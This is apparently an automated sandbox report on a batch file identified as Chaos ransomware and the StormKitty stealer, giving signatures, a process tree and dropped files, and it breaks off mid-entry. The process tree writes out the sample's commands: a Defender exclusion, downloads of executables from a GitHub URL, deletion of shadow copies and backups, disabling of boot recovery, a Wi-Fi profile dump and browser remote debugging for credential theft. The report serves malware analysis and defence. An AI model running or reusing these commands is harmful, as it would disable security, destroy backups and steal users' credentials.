Resubmissions

24/03/2025, 04:06

250324-epe7aswwaz 10

17/03/2025, 21:48

250317-1nzp7syxd1 10

Analysis

  • max time kernel
    109s
  • max time network
    117s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250313-en
  • resource tags

    arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24/03/2025, 04:06

General

  • Target

    fix (4).bat

  • Size

    2KB

  • MD5

    160b408ccc1bd513057cba516f4436e7

  • SHA1

    0deecfee13ebc656eecc6aaab2a8978bc93268d0

  • SHA256

    50c4082ed4c65e96649e53ba20fec89ead550d4774901dcccaf562db79a9e3e4

  • SHA512

    74777e896abd4ca6f4282a1dff09c133f95ecd17f1bb48140fce2f2cca615e5be034950cdf8d3ad3846338f442c8e326fac69ef1b18104bd344e7cd33bdec933

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Uses browser remote debugging 2 TTPs 5 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 5 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fix (4).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4876
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:668
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:232
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
        2⤵
        • Blocklisted process makes network request
        • Downloads MZ/PE file
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5088
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
        2⤵
        • Blocklisted process makes network request
        • Downloads MZ/PE file
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2844
      • C:\Users\Admin\AppData\Local\Temp\build.exe
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          "C:\Users\Admin\AppData\Roaming\svchost.exe"
          3⤵
          • Drops startup file
          • Executes dropped EXE
          • Drops desktop.ini file(s)
          • Sets desktop wallpaper using registry
          • Modifies registry class
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2036
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
            4⤵
              PID:3924
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                5⤵
                • Interacts with shadow copies
                PID:1920
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3980
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
              4⤵
                PID:2692
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  5⤵
                  • Modifies boot configuration data using bcdedit
                  PID:3460
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} recoveryenabled no
                  5⤵
                  • Modifies boot configuration data using bcdedit
                  PID:5080
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                4⤵
                  PID:3876
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin delete catalog -quiet
                    5⤵
                    • Deletes backup catalog
                    PID:1032
                • C:\Windows\system32\NOTEPAD.EXE
                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
                  4⤵
                  • Opens file in notepad (likely ransom note)
                  PID:2736
            • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
              "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
              2⤵
              • Executes dropped EXE
              • Accesses Microsoft Outlook profiles
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • outlook_office_path
              • outlook_win_path
              PID:4880
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                3⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Wi-Fi Discovery
                • Suspicious use of WriteProcessMemory
                PID:4576
                • C:\Windows\SysWOW64\chcp.com
                  chcp 65001
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2476
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show profile
                  4⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:3252
                • C:\Windows\SysWOW64\findstr.exe
                  findstr All
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:3428
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1008
                • C:\Windows\SysWOW64\chcp.com
                  chcp 65001
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4784
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show networks mode=bssid
                  4⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:5108
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                3⤵
                • Uses browser remote debugging
                • Drops file in Windows directory
                • Enumerates system info in registry
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:1928
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe30fbdcf8,0x7ffe30fbdd04,0x7ffe30fbdd10
                  4⤵
                    PID:1772
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1448,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2152 /prefetch:11
                    4⤵
                      PID:4752
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2172,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2168 /prefetch:2
                      4⤵
                        PID:2520
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2328 /prefetch:13
                        4⤵
                          PID:2860
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3292,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3340 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:928
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3360 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:5036
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4300 /prefetch:9
                          4⤵
                          • Uses browser remote debugging
                          PID:2604
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4772,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4756 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:2448
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4892,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4928 /prefetch:14
                          4⤵
                            PID:3020
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5044 /prefetch:14
                            4⤵
                              PID:1452
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
                          2⤵
                          • Hide Artifacts: Ignore Process Interrupts
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1660
                      • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                        1⤵
                          PID:3876
                        • C:\Windows\system32\vssvc.exe
                          C:\Windows\system32\vssvc.exe
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2168
                        • C:\Windows\system32\wbengine.exe
                          "C:\Windows\system32\wbengine.exe"
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4296
                        • C:\Windows\System32\vdsldr.exe
                          C:\Windows\System32\vdsldr.exe -Embedding
                          1⤵
                            PID:3528
                          • C:\Windows\System32\vds.exe
                            C:\Windows\System32\vds.exe
                            1⤵
                            • Checks SCSI registry key(s)
                            PID:5096
                          • C:\Windows\system32\BackgroundTransferHost.exe
                            "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
                            1⤵
                            • Modifies registry class
                            PID:2132

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

                            Filesize

                            1B

                            MD5

                            d1457b72c3fb323a2671125aef3eab5d

                            SHA1

                            5bab61eb53176449e25c2c82f172b82cb13ffb9d

                            SHA256

                            8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

                            SHA512

                            ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                            Filesize

                            40B

                            MD5

                            1d6d1e773c2cb63516dc875f48b6b40c

                            SHA1

                            80bcca5dd15ffceb74ffe8b17a31e5d46da41473

                            SHA256

                            2e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1

                            SHA512

                            becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

                            Filesize

                            87B

                            MD5

                            e4a639b9d8bf7a90cc97bb4e05a36753

                            SHA1

                            676facdabf06e5f014e95218bfc02b8c18c39284

                            SHA256

                            79da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd

                            SHA512

                            4a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                            Filesize

                            2B

                            MD5

                            d751713988987e9331980363e24189ce

                            SHA1

                            97d170e1550eee4afc0af065b78cda302a97674c

                            SHA256

                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                            SHA512

                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log

                            Filesize

                            3KB

                            MD5

                            662e55efd63947ac1ed9ab166fde4448

                            SHA1

                            ffdefed29e194510e0c86cb9063c2b6bf4b87223

                            SHA256

                            45e102a0dd571dc77afbf39c16f4007c44d643c58168b299f3a69a4769fb3793

                            SHA512

                            60b54ae86eb59911b0c2bd5f2420961fceaac2e3140039c9139c65902dfbf63eb8f19dec2ac4674d6c6b3dd2b4082e461bc53556912f7eb8f634d66c17cc0d1a

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                            Filesize

                            289B

                            MD5

                            541c42f1c98b3e1b011d22eba854e707

                            SHA1

                            db30188de1f22e3077e7044be1386a5d0ecaed9d

                            SHA256

                            0768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b

                            SHA512

                            47828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                            Filesize

                            17KB

                            MD5

                            4786cf24e3e07c212272a4c2c0aa6aad

                            SHA1

                            6948ce944e1dde09aafee35b61b7fee15537a785

                            SHA256

                            01637344a86333f59012fe115b1be0a8366587e176809918a2723a6878a23cdc

                            SHA512

                            6434ad876770eb4bb9e91c4ebb206c41f3b4d0d715ec363c8669d4b595fdd740ac3004855d482c71588f1f7bd4762d427974a4fce31dc50ad633d84d4f132654

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

                            Filesize

                            1KB

                            MD5

                            56220f7b661c85b776763c1a0f189326

                            SHA1

                            64e8d4898867dafa9de8b87862808a1ac05a1239

                            SHA256

                            6371d04275f796eebfdf9ab3c879f32a58af4cb04001598b8d109836b864b872

                            SHA512

                            3071338a1f5c80016f409105efd2367baa4f3742bdaaf41a97794f66670f246ff24f3c11c2fc26e5d33c17f33c3d19a2301fcf4be8ca239f0a903c3b8a2892db

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                            Filesize

                            80KB

                            MD5

                            38e61cfd456cf804da8e5d148eacf796

                            SHA1

                            0350a98c12d3b1996feca7f0c52be22dcb6079b3

                            SHA256

                            0f9fbf41d1153581a399ba5a5b1a3b785a4351161d6d650d19165a43f64185d8

                            SHA512

                            96ac64dc5a0b4e9e4b5314d83a21ab725ed64d45579875bf8f4a62401d13c598b9f6535b431f55198983830daa750467153643a0140e15d9ec4377db043c5eae

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

                            Filesize

                            226B

                            MD5

                            4ae344179932dc8e2c6fe2079f9753ef

                            SHA1

                            60eacc624412b1f34809780769e3b212f138ea9c

                            SHA256

                            3063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4

                            SHA512

                            fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            627073ee3ca9676911bee35548eff2b8

                            SHA1

                            4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                            SHA256

                            85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                            SHA512

                            3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            944B

                            MD5

                            05b3cd21c1ec02f04caba773186ee8d0

                            SHA1

                            39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

                            SHA256

                            911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

                            SHA512

                            e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            318b7468f95ad6548bb6b631a14863dd

                            SHA1

                            77e835ce5092cf8d6b04dbb42a2f4c66e63a1557

                            SHA256

                            dd795b9f7d426c42a8f35cda8e2223c41a5b41560cff651ae2ec89f9aeb16555

                            SHA512

                            0fe428f2607bceae4bd947417aa68dcff8eaf3bc328c88904fd0cc6a1b2e1ec9eda7fb216783476b811ea0a12199fea54751c9ba5e4d746c7c6f0a9a888ef76f

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            dd3474e6a72c08266c25f196f78b13fd

                            SHA1

                            b70c6bbd7794b49b6b9afa6343987a7f553d1268

                            SHA256

                            82acd1c6613bb2c907a26be1f61f6556ee03cabf1aa73dad27d012be88e05318

                            SHA512

                            cf5138ab09f19034fa5d058819956fd0556c56d674268e496dbaded228839d2be576bd74cda26127adf03cce9a8ab485ce6a07c7332a2c65a77ca9b56d92c79d

                          • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\267aad0b-2fdd-4292-8bff-59b3a5d8a384.down_data

                            Filesize

                            555KB

                            MD5

                            5683c0028832cae4ef93ca39c8ac5029

                            SHA1

                            248755e4e1db552e0b6f8651b04ca6d1b31a86fb

                            SHA256

                            855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

                            SHA512

                            aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147.zip

                            Filesize

                            407KB

                            MD5

                            b077dab664a004215814a4391b6dde66

                            SHA1

                            c3c2f1138317225ae98f616b080370cefa082c18

                            SHA256

                            726afcaa627b24e176cec78f636df4a66847f0716ea0e1161745d0c5616b5bae

                            SHA512

                            2927dd7361048783dba4324def7859b72b415045272278064dbfb024251b22e899e7b4f603f2b59d312855a9674c6ad2d2068eee7811e7079bc00a91fc5cc247

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeAutoFill.txt

                            Filesize

                            23B

                            MD5

                            f19d961388cd1c4572942a4f1397d15d

                            SHA1

                            95a89992f4fe50c0a6f4351c3f93c14487087844

                            SHA256

                            052caba139f51903bc4994a3cace4e65c87fd093b6efec8141e4a6c4625e380d

                            SHA512

                            66a82f3216189a50df4ca19194a1eda2989e6635fc115508d9c0b2a33b3345f657a17214c52ed78999eb8a3e571199e70c3ae4854deaa7eb1f380af7f6f8fb09

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeBookmarks.txt

                            Filesize

                            19B

                            MD5

                            c5b94f01b5b97e31f9cec28fecefe0b1

                            SHA1

                            5a2f650235d6319696f02a10a0393b47dbddcd81

                            SHA256

                            bf9eec15e97a4addb7f3b9a15f2de3b5499428750e3ecf1cbad5e3bad5e00548

                            SHA512

                            8e6a75963a9e613ee3a5fe4032c42898904426c19541ec54404811482ef8aac4f84ff23bd80d72f0d33215dcde7d008fcd4687c79ba35cac5b4240c5ad5b109b

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeCookies.txt

                            Filesize

                            17B

                            MD5

                            964d5571d9a4fec576fe454162f2e844

                            SHA1

                            6234d1102a5012094dc8818bc045f7890d270905

                            SHA256

                            6cfad5b342f80a79633747ee591775dbf46be34fbc793930e5de9aab7afb9995

                            SHA512

                            402b81b47e62fa0d2b993eb01df725d1f3ec826ed76c0ac17d5ebaed048e6c7556ac2e1b3c0141e2347386cb5c7c74377c37f990ba9b5745f388181153b8a46c

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeHistory.txt

                            Filesize

                            17B

                            MD5

                            b80546283f231ee762dee4b33b0aa091

                            SHA1

                            ec5a0f5581d8d9e9784f82b77e4e0eb187d78301

                            SHA256

                            188352fe4a40938e0918eed1c4b0ae7266fb13c9de77330e04f192711d15c6f8

                            SHA512

                            df1519614443b80b22a601ca4f1b4119eeaef0715fe913dd327a7c247986cba16cbbd7f55e32ea0557b5e5338897c0f82ac23e91d69836ad280c7f587d863d51

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgePasswords.txt

                            Filesize

                            19B

                            MD5

                            c4efd9a7b61ebf43b608440be5e33369

                            SHA1

                            926418256c277f1b11b575ec6e92ce6a844612f7

                            SHA256

                            ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f

                            SHA512

                            9ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

                            Filesize

                            81B

                            MD5

                            ea511fc534efd031f852fcf490b76104

                            SHA1

                            573e5fa397bc953df5422abbeb1a52bf94f7cf00

                            SHA256

                            e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

                            SHA512

                            f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\DesktopScreenshot.png

                            Filesize

                            407KB

                            MD5

                            3625ed17a6255827969ad5a404f0e41e

                            SHA1

                            87922c687d7c31aef6b20da03c4621b03a617028

                            SHA256

                            c7fcc119a5fcf6b96a186e837887c22c2d1b59de5fb3c263911843f9cc6b9be3

                            SHA512

                            4bd2de013dad5a094a3a28fe171fc0ebe97dfcda5413fc3d0d1f0aced57cc892d0a0835708e42cae720c71befa02604590638cc9ba2f4b260abf14b5d67bfc16

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Info.txt

                            Filesize

                            354B

                            MD5

                            20a03bf7481ae6484d0623abb566212c

                            SHA1

                            08e6067ea2ec07126473066a53855d1f743718bd

                            SHA256

